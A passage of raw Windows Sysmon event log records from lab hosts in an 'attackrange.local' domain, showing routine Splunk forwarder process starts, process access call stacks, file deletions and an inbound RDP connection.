Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982050Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:28.410{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982049Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:28.410{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982048Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:28.410{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982047Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:28.410{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982046Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:28.410{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982045Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:28.410{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982044Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:28.410{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982043Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:28.395{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982042Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:28.395{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982041Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:28.395{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8E80-6151-347A-00000000FD01}512C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000982040Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:28.395{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E80-6151-347A-00000000FD01}512C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000982039Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:28.395{69CF5F33-8E80-6151-347A-00000000FD01}512C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000982070Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:26.653{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54000-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000982069Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:29.551{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FFD30AAE1116E45C75760996C3BC6D7,SHA256=B96113D82521E902ABB8F775FB9AEDFBDBEBED6E2324B0A3E755E98379CCA362,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982068Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:29.551{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68E576AE91873C3AC0F22B9730033DCF,SHA256=59AB1D49CD1CAF76F19F76BB16897C19B90691786D3E06D95ABE0AE1333D8186,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000982067Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:29.223{69CF5F33-8E81-6151-357A-00000000FD01}18001496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057653Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:29.674{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E81-6151-D400-00000000FD01}3612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057652Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:29.674{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057651Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:29.674{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057650Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:29.674{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057649Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:29.674{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057648Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:29.674{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8E81-6151-D400-00000000FD01}3612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057647Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:29.674{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E81-6151-D400-00000000FD01}3612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057646Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:29.674{5EBD8912-8E81-6151-D400-00000000FD01}3612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057645Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:29.420{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2D7CE823670441C34C90209AFE14CFF,SHA256=34C56F96CA4DA19C2136DB5B280F85AC3B3321CA10FE3B9DF8CC27022B468CDE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057644Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:29.279{5EBD8912-8D2A-6151-9600-00000000FD01}46324940C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+17e4d|C:\Windows\System32\SHELL32.dll+61dd0|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057643Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:29.279{5EBD8912-8D2A-6151-9600-00000000FD01}46324940C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057642Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:29.264{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+17e4d|C:\Windows\System32\SHELL32.dll+61dd0|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057641Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:29.264{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057640Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:29.264{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program 